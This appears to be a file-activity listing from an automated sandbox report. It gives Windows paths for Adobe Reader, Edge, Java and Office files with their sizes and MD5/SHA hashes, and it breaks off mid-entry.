                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\bg_patterns_header.png

                                                                            Filesize

                                                                            704B

                                                                            MD5

                                                                            7d119fd6b421b73e0c7bee830433426c

                                                                            SHA1

                                                                            ea2ef907f366628b194449131a8c67b81abb2400

                                                                            SHA256

                                                                            b9355170c1001eff1e47888e7c8c3b99881d3e1ef48ad83f920d500ea92c62b2

                                                                            SHA512

                                                                            aeaaf374f2e4553d7ad31ac519f0f06c505ffdfbee0f899d19972205f5c773955734e98406c5ef536481eeb0a150e0c033106f47b13e0b913758471f0f5535b7

                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\illustrations.png

                                                                            Filesize

                                                                            8KB

                                                                            MD5

                                                                            0eee27830db5e0e423a790136bb356a2

                                                                            SHA1

                                                                            e9f2649edcee84460347cd7f3c39738a69b7f15e

                                                                            SHA256

                                                                            15206cb6fe8a57d88e2925d145629482e09248f89c8f782fad9bc2eb68cf6b63

                                                                            SHA512

                                                                            b751afc7e53cdfaa6e3887699f28862b487dab6160fb97c3804ce715a13517f064a4e52905abe0a7a4f0fbcae6e44abd39ff2bfd45eb78818ca08baf1b5938b9

                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\illustrations_retina.png

                                                                            Filesize

                                                                            19KB

                                                                            MD5

                                                                            b6f7a5151bf672cf650f13752a01210e

                                                                            SHA1

                                                                            1a19910e0b3aca48171e460b143aecb95be9f3c3

                                                                            SHA256

                                                                            45c2844e56b9f51163a180d6aa28e3d3149113d0cc8e2b0a08ac22db555a4302

                                                                            SHA512

                                                                            1fdcdd6fdc323fb383bacd4d88a9172bde07446788f7792e1d8b21f98fefc6c724ae1b57e26c9175570267754de9449e47fa755ceaf92793bedb13253cd3dfd0

                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\progress.gif

                                                                            Filesize

                                                                            19KB

                                                                            MD5

                                                                            eb93024ea7e556688669550bcd6035be

                                                                            SHA1

                                                                            cba1d40a762db06433c853a0bc1daebfef8759f4

                                                                            SHA256

                                                                            884c2fa71d2c18ef957f6613547aa1c77fa719d11aa16b5ce424c53d449ef51a

                                                                            SHA512

                                                                            df8c4aa265245673a36704c4d3fd3ef1136730c80c34b9e81d295649fbcfe8f73ba949cb5ac3221e31323127ef66a2bc338352cb1b0e3e7e71f1b7562403ec74

                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\themes\dark\faf_icons.png

                                                                            Filesize

                                                                            6KB

                                                                            MD5

                                                                            e11b645de5e7687cd27d8a22b333f7df

                                                                            SHA1

                                                                            4202a57f7fff53568fb925915e6d86529c99c549

                                                                            SHA256

                                                                            456bd4474e70fd9d8a3b27c66e69601405097cd091b72aeee0785272aa0b7d38

                                                                            SHA512

                                                                            7662523bc50644d8a27581cb3f4ed68f276cf6d6e86711b626331754c2ca791e379de3dc3ed151f7fca3031b69b3b4065a03ea3d21e630d0bfcebac6cc9739a1

                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\bun.png

                                                                            Filesize

                                                                            2KB

                                                                            MD5

                                                                            03fd2ba1aefa821316c23fc0ad7a9948

                                                                            SHA1

                                                                            129f4512945f5de98c6eb39e5d67fa92e7447b74

                                                                            SHA256

                                                                            c663e4df263c4bc8ba8f0f85de449a9a22dde878a9726c33e292dbbd2ae9329e

                                                                            SHA512

                                                                            a316157333dd51abf4f8090c6b71067c216e3ab2ddc7169d87cfaea4c8b6064f2e8c5e78b8bc66224fde4fb8d18821ceae409ef4db68088cbcc6230f4e551902

                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\cstm_brand_preview.png

                                                                            Filesize

                                                                            2KB

                                                                            MD5

                                                                            6ad90c9249b4099d11f1dbe16662b631

                                                                            SHA1

                                                                            2184cdbe5f7383f4536c6d96709dc9b34f060220

                                                                            SHA256

                                                                            61eb2331926e209e3b46570812e2e13ba5b39801918516997e84f4b59d3f1097

                                                                            SHA512

                                                                            7a2fc7879a91f7430d9f1a2824b851d47297750469ee5870f1c233f1abeb47baae98472b7ad080e168ca130b9434c04bc0f66ae1f241ecb5d801a50281298278

                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\cstm_brand_preview2x.png

                                                                            Filesize

                                                                            4KB

                                                                            MD5

                                                                            b3251de34f891daf35d8bce7212fd763

                                                                            SHA1

                                                                            c35dfd626a7ab88080a9e0e737c60562e7c9d13e

                                                                            SHA256

                                                                            04f1e7d8b5945d7dda908ffb158076fa70190c05a40869a36e0e123266f1913c

                                                                            SHA512

                                                                            8760d95081c4357103808f56f1eedf886c05c7fb13317002c67d8ad0268f1702a06cc9b32b3be081b7b6ea1b3310ac11911133cf1b5c6aba39ee02c2281b0d32

                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\dd_arrow_small.png

                                                                            Filesize

                                                                            304B

                                                                            MD5

                                                                            21b6993ed7f2ead473822750330ce61e

                                                                            SHA1

                                                                            3ce84fcb1f386bb57ade68b68901796d300c9d27

                                                                            SHA256

                                                                            6acf60f4058b0bc525d42197107ca70d9db5c487b48d640848eccb5be7f1220d

                                                                            SHA512

                                                                            00b1a439b62ae2271840ac585acc0b53560d3b2536bd34c94e3134e25159b58003401dd4e9d2a4e2188a19e4a50622fa6c2378f3f253905a14305d809dc9530d

                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\dd_arrow_small2x.png

                                                                            Filesize

                                                                            400B

                                                                            MD5

                                                                            70522f636bc66c7db879af8bc8c82283

                                                                            SHA1

                                                                            a5f9e8b96585f04ba60d33b8b52fefd9a62a351e

                                                                            SHA256

                                                                            b083444d286df6e2088cf7f66188c9e9c9892787feb0c976905ca6583c096a7c

                                                                            SHA512

                                                                            eda05c8c38055a6c21e4c6cf514a57dd72a3d9c7b91a661ef5d384596a43686406a78496197741a5a4fb99076682a230b3581b48d72c8ebfc343446aa618dec3

                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\illustrations.png

                                                                            Filesize

                                                                            4KB

                                                                            MD5

                                                                            880ca84f37eb2b3c7429c9ada236d093

                                                                            SHA1

                                                                            61a9f7d3e838bf537f55866a0f425dd814fffd9f

                                                                            SHA256

                                                                            e227720df98cf4b09ab22f6c946e4abb2ca4fe2b4ef4726a8b741f2e4dbb20bb

                                                                            SHA512

                                                                            cfe74b82c6d4c84630ce081d28ca17c75310f0d4c85249102cf178e6577b79efa6f9e30f3cbc4dc1f74b10a0b432a63ef74fadd8d90923c1e0cfe58271f211b9

                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\nub.png

                                                                            Filesize

                                                                            1008B

                                                                            MD5

                                                                            11c6679c44b5d47180867e5aa8c0eace

                                                                            SHA1

                                                                            45ba838c2ada43a0989fb7f316ef472a06aad2e0

                                                                            SHA256

                                                                            0facd339e8eb387462b25e041d1d5189f281730e1c057799a2fe3b220ac983ea

                                                                            SHA512

                                                                            8eca06f4d7237e5d712a72b6706c8424e4521a4b4c8ca7bdd529083e2ba37e7d8d142ac75289c4c0757eea48cd46abb5e5d12efc5a0227ce6a849d0009764ac2

                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\share_icons.png

                                                                            Filesize

                                                                            1KB

                                                                            MD5

                                                                            48ed5aa8983106d1b5fdd4385c70818d

                                                                            SHA1

                                                                            5ba4d0e063da7434deea5e09531ee26abaa25563

                                                                            SHA256

                                                                            b21e4fc191f105013402a157189492b429a6179d7086f34203fe43845fc5f9f1

                                                                            SHA512

                                                                            82cf115cce86ca09972572ad5f666ff8ce11e6fc8fd23a034abd9e9c0c93972ff9997eac171de7d789daa43be95f69238499111a26446b8bcfe141281443461d

                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\share_icons2x.png

                                                                            Filesize

                                                                            2KB

                                                                            MD5

                                                                            b855b4ad9029bdbbc622e0ea2b5a6486

                                                                            SHA1

                                                                            14d80c32dd1f8ee257f97760b01b1a0ff3f6ca1f

                                                                            SHA256

                                                                            f618e5c6184ea99b65a0a17ae9233f85757c5cfe3816c6c952373dfcf49abda1

                                                                            SHA512

                                                                            38bb55669207befa260b3da9e4855b8dbd69092dc0f967254c87a8dcb3f00c6ac9ae034fa13561caa0739684992f278fdecb2c80e43de17b9d719ed43095e734

                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\adc_logo.png

                                                                            Filesize

                                                                            3KB

                                                                            MD5

                                                                            b116160e02ea0cff0b16e0048cc4ff59

                                                                            SHA1

                                                                            85b2fa899aea566637ec22a9b8e3cd0241be2b2a

                                                                            SHA256

                                                                            e595e932315e5c5a56685ef089ef5d486ed73626e0b5fa1a70370273ddb6f0ad

                                                                            SHA512

                                                                            ccb16ac41b3c16e2212a29c0b1ab0beada709f68a78b8e2008a7addf3696bc1230fd4d9f6849113f4d7de86d431a795b19cb3ac2f6199d270858a21f4c8a4ee8

                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\adobe_spinner.gif

                                                                            Filesize

                                                                            560B

                                                                            MD5

                                                                            60b0e216f5beb47f02925b24bb0723fc

                                                                            SHA1

                                                                            07c47a05457b139df2e7c8bc6979628c24d91484

                                                                            SHA256

                                                                            2234278e0cc3182556d84c5eace2242fa2cfc88b6fd81dda8a136dae59a2adac

                                                                            SHA512

                                                                            ab25bb0be5f80b2c3fee30e35aeed993fbc5280834bd0e6d2ab7e48b09ec5e38a261dd8f68acc715aaddbb596c47e68322f848531417d25ba19bc7e33b35aaea

                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\logo_retina.png

                                                                            Filesize

                                                                            6KB

                                                                            MD5

                                                                            e3af592ea8b31e7495e48ab6ac22d415

                                                                            SHA1

                                                                            3c40e9b05a7be9a7e7f9bcd4b02b8cb61b65bd4c

                                                                            SHA256

                                                                            621f35012899064b4c40a549a9e221f712e75bf13ac69990c363a648283e3052

                                                                            SHA512

                                                                            651adad14721dfed1e36c5009caf9c04cf1d024b35b187c0f98d456f0fb5218559b5d698697970e45fd165c2d4db0710aaaaaf3f00d5c12fbd2acdc3e07ce412

                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\sat_logo.png

                                                                            Filesize

                                                                            832B

                                                                            MD5

                                                                            8bc25a8a17642f8b13883930652a56bb

                                                                            SHA1

                                                                            5a011f8be10a146c584992234ac9cd7b5de682ad

                                                                            SHA256

                                                                            7237f59b895ad0321bd1acba35a860c84b07e6958ec5e17ec38676264275633d

                                                                            SHA512

                                                                            b6750c535fb48722840076eb0afc01fae88ff94d0d52e12d42e7b346b9a5c08a6cebfc25196ce3a10782e3746e54c145cafeeb570842086e646e9ba2b7f49ee4

                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\sat_logo_2x.png

                                                                            Filesize

                                                                            1KB

                                                                            MD5

                                                                            4f9abadfda79e88204a976767e630a81

                                                                            SHA1

                                                                            dfabea2cbc722e3b944f70e57c97a1f95eea064c

                                                                            SHA256

                                                                            b0b72f409a6afed7bf3a84ab2acb321dc157fb39c6a9154be6ad3bfcca156805

                                                                            SHA512

                                                                            014444ea7ce72bcd4d4feeea19061395c4848d8f003e5e75293c830b9a111255171a30139fdbbd8537759f828de6b7404261d679df75b2a26d46a277a4bdcbed

                                                                          • C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt

                                                                            Filesize

                                                                            32KB

                                                                            MD5

                                                                            69e8486ac1094b9c19066f5f2d04e2fb

                                                                            SHA1

                                                                            3fe42d8c58e2d76b2f272d7d83baa084133159f5

                                                                            SHA256

                                                                            c4b615cd5963f4df6a4d2447c3a19708d77ae54bf65d0ad7d370b8ba74c81d71

                                                                            SHA512

                                                                            b8b457a5e5b905a9f6eeed7a1c0f77f0e3fd8119511a9c60f1af890a650e6f90630b8d17adce8157b4cdfcd53c62bcfe577fdec552bf0a7a587e2e8218f79609

                                                                          • C:\Program Files (x86)\Microsoft\EdgeCore\90.0.818.66\Trust Protection Lists\Mu\Other

                                                                            Filesize

                                                                            48B

                                                                            MD5

                                                                            fb5392de1c41bffc48a74176c4bd14df

                                                                            SHA1

                                                                            4ca069c0d38e5ca258b2d743a95d98f60ef6964a

                                                                            SHA256

                                                                            8966675c3250f21d86672e16c257f1b84c3895254fbbd1807352c29997dcdc1d

                                                                            SHA512

                                                                            028d58bff3b55c7b0f3ca55e67f4fe809dc2c6a0f7d5ce1e1a8d6301ba68bd6706938c3418adb26c6e7bcff9dd72ea02fbd96795d56f5eb5c62f6dd69f0714ca

                                                                          • C:\Program Files (x86)\Microsoft\EdgeCore\90.0.818.66\msedge_proxy.exe

                                                                            Filesize

                                                                            832KB

                                                                            MD5

                                                                            c1259bed6439aa6e5f630f76c82faaa3

                                                                            SHA1

                                                                            bb001fca6d860de4800863b8b3ecda9661e27ac3

                                                                            SHA256

                                                                            8454572e0371ce23c3f70b827a12b4d6aab591b1958117cdf0a0d8920c11941e

                                                                            SHA512

                                                                            14ce580484bcd5bbfefa5d26f39b19f480d08890567abca2261409a39be0a99037a19d1f67e3888e70a0c6cb1f1651f679e7be9da3650d621b86fa44fbbea421

                                                                          • C:\Program Files (x86)\Microsoft\EdgeCore\90.0.818.66\pwahelper.exe

                                                                            Filesize

                                                                            972KB

                                                                            MD5

                                                                            f84250cd82def6a8ddf2e96673b4c0d8

                                                                            SHA1

                                                                            af06f75e48ff39f9203da6d5ee6a299bcc00c168

                                                                            SHA256

                                                                            256d30061f267ff7240cf528f6aed0bb447f75dc5f8666a5bbb8d4320aab6f68

                                                                            SHA512

                                                                            47e2a12f1c544a7259f157628808bac7f0cff5157f44f109d9d86ab43c2ae12618e0510057d17a648ed9bdbfd33f3100376ce9b63fdf52fdccd5f6b78214dd0f

                                                                          • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\Trust Protection Lists\Mu\Other

                                                                            Filesize

                                                                            64B

                                                                            MD5

                                                                            c30513c2d02b97cdcf3b429322048104

                                                                            SHA1

                                                                            0d0f47fb24255e5104dac2611042c967107a37fc

                                                                            SHA256

                                                                            8ebde371a260c9955e63739daeba52f4a17b7c9cf00e6af00d35d92857e37247

                                                                            SHA512

                                                                            e545fc28eb26a985ad69e07cee255ff50bfbae0e37fe758bfed04e353815c5dfd26e1f5d362c113d12e7ba7cf0ddf129c86efb63cd3e88217b4fa06c13986a99

                                                                          • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\libsmartscreen.dll

                                                                            Filesize

                                                                            3.9MB

                                                                            MD5

                                                                            fb544cf47c7e6aa7f45f90e0d911d07c

                                                                            SHA1

                                                                            ff86dae2fa9291ece582f36b91c5ba0516b4a87c

                                                                            SHA256

                                                                            982136034db61eb4c5cd684ef2b5271eaa5a3de02d640522d7f9e9a4f19f24a4

                                                                            SHA512

                                                                            b7391b70776bc5e2396a80ea002006133a7cd347f123fc00614cf3b9955a6996c7a576753b4dbbed56d63094fd3f7ac0286c4bb1631ae59cb057992473171180

                                                                          • C:\Program Files\Java\jdk-1.8\jre\bin\plugin2\msvcp140.dll

                                                                            Filesize

                                                                            558KB

                                                                            MD5

                                                                            3718c9de534a250c91af369b68cec585

                                                                            SHA1

                                                                            0f34b9a3b5dba1f9873c257e7ead475134ec3862

                                                                            SHA256

                                                                            f2c5a7bf2f786729098a2c968d692dfc930b9992bb1d924c3e3e0158c66d1806

                                                                            SHA512

                                                                            c91e42877a5793f3857a052616e424e6a705f7f388f49c189c52549b33719075c1762cbb171bc7b7634443e470428de60b349d3e66dbab104d7a47644bbd4c1b

                                                                          • C:\Program Files\Java\jdk-1.8\jre\bin\plugin2\vcruntime140.dll

                                                                            Filesize

                                                                            95KB

                                                                            MD5

                                                                            8b883cfb828e42d37338ecfd5be914f9

                                                                            SHA1

                                                                            fc6a3aa4613ccba7144e4ea0bfc65d583fba0750

                                                                            SHA256

                                                                            b7de8344794a8e56100fc90b16932fc3bbfbecfb1835bd91e550d2b80cfd710a

                                                                            SHA512

                                                                            efbd59968258fb528ffed32d9c15cb8de4dae30ba9edb9c8fdf5ca0c57c5f23e7f51e17b2459853b1cf8b86cb61ceca2bcdc43b34942dc9221c48b494c014c95

                                                                          • C:\Program Files\Java\jdk-1.8\jre\bin\plugin2\vcruntime140_1.dll

                                                                            Filesize

                                                                            36KB

                                                                            MD5

                                                                            26ff67284dc3aad964b49b24a590760a

                                                                            SHA1

                                                                            96da840f7cd1de5a41d8a99d79fdb4e85739b2bb

                                                                            SHA256

                                                                            b6385bc4bd4c360bcccd9ec85ca45d07f58081c9c40a7b41020f01dbb374dd37

                                                                            SHA512

                                                                            dde58f02c3eab34c91729b2a75d8ef4be220beae0a22e3f80b8a892ec0dd6c0ef68f2a2c11afa71c59059ec04254b238f678eac06223f20c642dcbe46bc972d0

                                                                          • C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\win32_LinkNoDrop32x32.gif

                                                                            Filesize

                                                                            160B

                                                                            MD5

                                                                            c30c07baa17c138a13e17052d3fa7cf6

                                                                            SHA1

                                                                            47f192d626aa1af95002c8360b9747e98994a521

                                                                            SHA256

                                                                            c96ca9888057e1db1eb54683f0edccd096423260557f74100af24477851cefc9

                                                                            SHA512

                                                                            881c0123c794f2b6b034cb18bd69ac3c31d5947e01b680b46c0973a498d5f9b45a89acf7907fa23ca1c2691dd900931aecbe5795c187fde1f2e696166a825d90

                                                                          • C:\Program Files\Microsoft Office\root\Office16\1033\ClientSub2019_eula.txt

                                                                            Filesize

                                                                            48B

                                                                            MD5

                                                                            9f6949929ca656c791ebe02c48152ccf

                                                                            SHA1

                                                                            1286460cb7df2d96c69c43d6ce21114d57116c03

                                                                            SHA256

                                                                            5316fdaecdb6d5d12bd8d1d5b0af2441a637e3fcb4bb6dbe1ad6b98e294458d1

                                                                            SHA512

                                                                            1bde7ede376e8d55ef2743f439796b9f16937c44c895bb31d41e35f51cf875cac1c8e1f1e4fc5df3085f8e97d1829b53b6f27a5ab25f8412022b8b936ef130e6

                                                                          • C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Localytics.dll

                                                                            Filesize

                                                                            16B

                                                                            MD5

                                                                            04992ba54c98703d1587f7e7bd14bb6e

                                                                            SHA1

                                                                            d45161b17f67a5cfbff199b63df862ef698f42c5

                                                                            SHA256

                                                                            bb4a87c51ddd413ecee6a41edac55bebdbb323a7626a8b9adbd733c2b189e211

                                                                            SHA512

                                                                            2b09199c686645d85df768bd9b5ee2c09abb6b17123a0ea1fe94a74ea28535b4091d90ed58e846aed6dccc4708fdb88e23157d12a88cff691b29d9b7f4e3b285

                                                                          • C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\OpenSSL64.DllA\zlibwapi.dll

                                                                            Filesize

                                                                            274KB

                                                                            MD5

                                                                            c3de2e0ef2390208308d19a667511d7c

                                                                            SHA1

                                                                            aafd4b775254040f75ca42dde63b046f8cbc303b

                                                                            SHA256

                                                                            bf5bf44f16687a3283b454d28aa0bcd1366207b1cb8e613954be134213c1556c

                                                                            SHA512

                                                                            0e33e40be8b9c47e0d432e3d1cd1547042d7ec7904ebff4d0806133948f0b47b0a74a75f30a46a09baeb1e6b6668030368875b3bd91d18e3ed4ff86282d4ab79

                                                                          • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-core-file-l1-2-0.dll

                                                                            Filesize

                                                                            18KB

                                                                            MD5

                                                                            339c6be0eab616094ea3396922b07939

                                                                            SHA1

                                                                            01aed2283df54a5fd3eaa3be4f2f34150b11e731

                                                                            SHA256

                                                                            4cd00bd528f99af87460a8d49ae99d391e22b124ddd2731571f10c68cebfee8e

                                                                            SHA512

                                                                            5740312ce9c4346196fb6fe5b25a9e5fe5910aea84e018d913ac786ffe5c2018fe6ed2fc8c7105dd8c6404378479646bae9c93a0e75edf76b687fbdc5afef43c

                                                                          • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-core-file-l2-1-0.dll

                                                                            Filesize

                                                                            18KB

                                                                            MD5

                                                                            54f0489fe04448cffaf9390692c22463

                                                                            SHA1

                                                                            6ce434026a626fb5b07cb0e9b39fb4b0946ddca3

                                                                            SHA256

                                                                            6fef35d904c82c9a5706edfd9105482cc63132651a468b6b368c25e64a7cddf4

                                                                            SHA512

                                                                            3031b323a2ffa8423f9fe86c60003194c97bd9b1a88cab8658e9b7208af3e862a5a18ae18fdf71a6df68de4e3f1b73bf6c4301867f1339e1bbf7a14afc959d4b

                                                                          • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-core-localization-l1-2-0.dll

                                                                            Filesize

                                                                            20KB

                                                                            MD5

                                                                            54fc546b71b78e7beb9589b02d33e054

                                                                            SHA1

                                                                            2a97bb834646e3e3899b8f851a76ce25f99465f8

                                                                            SHA256

                                                                            993cbad15c696310e2085080ab2cb56d0e5ace98f968077a74dd01bb93d16cc6

                                                                            SHA512

                                                                            db3d89190db3d5f9da4e72163f5886c0dd8176857ead49305ce3e0af8655306afd29ed0fe18de426ebfc99354b247d166f78e7ec754c3efc424528d644b21da8

                                                                          • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-core-processthreads-l1-1-1.dll

                                                                            Filesize

                                                                            18KB

                                                                            MD5

                                                                            b490d4c8ebcf01e65b2d6eb239d82420

                                                                            SHA1

                                                                            a376aec1ae9538cf95f8b474215e2981522c1468

                                                                            SHA256

                                                                            8bff7db2ba3c699d9db85a90905defc041cb87b72dd7cf6040576c80ec102175

                                                                            SHA512

                                                                            179a1e5b8f2dd1a06cd5bce3a0108fa6aae03471aeb5211b3c60abdee8b056440f6ede0d7877021ead99403ec805f4c1de875cf8e21be7247c4363752711e9b3

                                                                          • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-core-synch-l1-2-0.dll

                                                                            Filesize

                                                                            18KB

                                                                            MD5

                                                                            7910690e6c08fe8b229f795e81a9d6ba

                                                                            SHA1

                                                                            c344232aae69dd3cea6b06e427b1cb5b4f2ff558

                                                                            SHA256

                                                                            ab9484ff92d5586f6c76ad2f270c5afed8facc21f96a08f25126b9af23abe465

                                                                            SHA512

                                                                            a06919224b6c1f52bda9c66386470bc775e5c4f3173b2259524781e789eb32df6bd52e74f2d5f888008b27bf364073e927a66683e42cc22f0b82a143728cede3

                                                                          • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-core-timezone-l1-1-0.dll

                                                                            Filesize

                                                                            18KB

                                                                            MD5

                                                                            d15dd921cbf9e0d81b94eb86b0b7101e

                                                                            SHA1

                                                                            1d94ce2f5ec4f00ed76f8643efc3917dd5d46e54

                                                                            SHA256

                                                                            72bee22cc33d7d615a7136fdf9963333050674d0d9b54cf032f552e25fbb4b8c

                                                                            SHA512

                                                                            da41225f9791ded813276a1934ff415ce98d84f46876c9ffa8e89e69692957677202807dac08674fb606406a3e90d5ee9a0087a96bba06994b08a9369734e31d

                                                                          • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-core-xstate-l2-1-0.dll

                                                                            Filesize

                                                                            11KB

                                                                            MD5

                                                                            7b0360a1cced425944e906d15d09a90b

                                                                            SHA1

                                                                            4c323e300de86a36631f4add3afca1df1b379e6f

                                                                            SHA256

                                                                            434a01b0b3807d7084471263f42bcc07c8e3be23abdc2585457a2840cc410c5b

                                                                            SHA512

                                                                            30fe2b5871ebd8540c5eaa7c20f4f7ef06a6aba380e7dfd58016a4d4ba2c34d9b82371842eb20c91593aee2a23ca053739da69441f88b5673af7a11982f74150

                                                                          • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-conio-l1-1-0.dll

                                                                            Filesize

                                                                            19KB

                                                                            MD5

                                                                            0bf68146c22ec9c984f0de95097c2331

                                                                            SHA1

                                                                            21c61b244d8a6c0aa037af73ec5259ea42d6bd02

                                                                            SHA256

                                                                            4cab91bbcf997a1d76f6b7b7db543cf1d8b087d696c73c46d79286a0727b91c3

                                                                            SHA512

                                                                            d59892ced522469855464306a4364aba9075288e37a63143a9d670e636e22fc217f80e4e621ec6592b6554643526bd23bec7ae10b7d20e27664dc3c25505aed1

                                                                          • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-convert-l1-1-0.dll

                                                                            Filesize

                                                                            22KB

                                                                            MD5

                                                                            48d0edc9716f9c61bc247444abdb2121

                                                                            SHA1

                                                                            2c58d6d7fb83d343099ae6b001ccd715a543ea6b

                                                                            SHA256

                                                                            52b13667ab66bfd3f717e17e6edb722dc42e6c655658f03a9c42d2079c62481e

                                                                            SHA512

                                                                            09abfcfe65e5954ec61f7cd53aa690ce8cb22639019356e2362175a6ac596478fb833c023d9f72d32c9084c04107ced01ecb1a899fd4b3241f9e2520d113ff51

                                                                          • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-environment-l1-1-0.dll

                                                                            Filesize

                                                                            18KB

                                                                            MD5

                                                                            b294d35d575c1645c13f808aa45124d6

                                                                            SHA1

                                                                            ccfa5e49dcfb040ad4576d728265c7debb87eb00

                                                                            SHA256

                                                                            883782d4b835b2c862416bdd63fecd171f1dcebabeb181512ae6048b095fcb01

                                                                            SHA512

                                                                            77d50b50241af441a4e7c68ff0a0cb03bfb7b40a9459977682cd2e604932ce1568902b0c195bd373b693350ef2faa1fcd156d038c8da76c1b317fcb24db2a4dd

                                                                          • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-filesystem-l1-1-0.dll

                                                                            Filesize

                                                                            20KB

                                                                            MD5

                                                                            ec64027d9a14cfeb84df2b3d81431d63

                                                                            SHA1

                                                                            40bca743662d2d7298bbbe1440d65c5881854f45

                                                                            SHA256

                                                                            77bb3f665f04654addce7de80224a2f0c609ed2417bcc53154729ff71c9759af

                                                                            SHA512

                                                                            fe68bea1d24f02833625f999dd29829b8d8ba371e1b25cf6733b800f4d26aea59f8713c580d02e732656411934b9edd43dc2fd57ec3216579635b6a3a95d1669

                                                                          • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-heap-l1-1-0.dll

                                                                            Filesize

                                                                            19KB

                                                                            MD5

                                                                            f8a3bd5966a848bb9b45610def88facc

                                                                            SHA1

                                                                            7b2c51dc6598f993e101263d1d8dbaff01e5bc12

                                                                            SHA256

                                                                            a6b653163c6b0a891ed66658187e4607763b344720194411a93227652a0a4034

                                                                            SHA512

                                                                            2315dd9311cde42a1a0e6435709ffa9d2368d917cd030f45ef447a23262ca100f2182ac43b8308a747682a1f7b799fe26fe8f37fe757da3eb265adeb2092dfe2

                                                                          • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-locale-l1-1-0.dll

                                                                            Filesize

                                                                            18KB

                                                                            MD5

                                                                            cf93ae98901a9e1ff484da3ddf50de30

                                                                            SHA1

                                                                            09fa8286fa39778940a95ffd3a99432e9e436832

                                                                            SHA256

                                                                            656f39d051e9be98742237de26a921ca488cb588c1ae2807f907c90877a8c82d

                                                                            SHA512

                                                                            a69f6d5e96d73c0052948687e03e6630451d8c0a554fd41432d7f2ce68f5677ab63aded294c6378ac0ed7959b8540c4c8cc26606293d602ca72713c267069355

                                                                          • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-math-l1-1-0.dll

                                                                            Filesize

                                                                            27KB

                                                                            MD5

                                                                            e1c38947ee1f511d818dce91c75021b7

                                                                            SHA1

                                                                            3cc88db0d4e0cbf752f7bc559e3d710edf4bccd8

                                                                            SHA256

                                                                            e7a0638ffc1953fd09f5e8e9a13d10617df49e176b1e1efce9ba2c0dccbbc60e

                                                                            SHA512

                                                                            c24686fed93491afa3fafbeb57262c80149bb8beb230fbbdcb3a594e3f95dcfaf42f88a4f290cfbc74f71fc4c98152cedb174e4e75d3721f003f7c8189d67690

                                                                          • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-multibyte-l1-1-0.dll

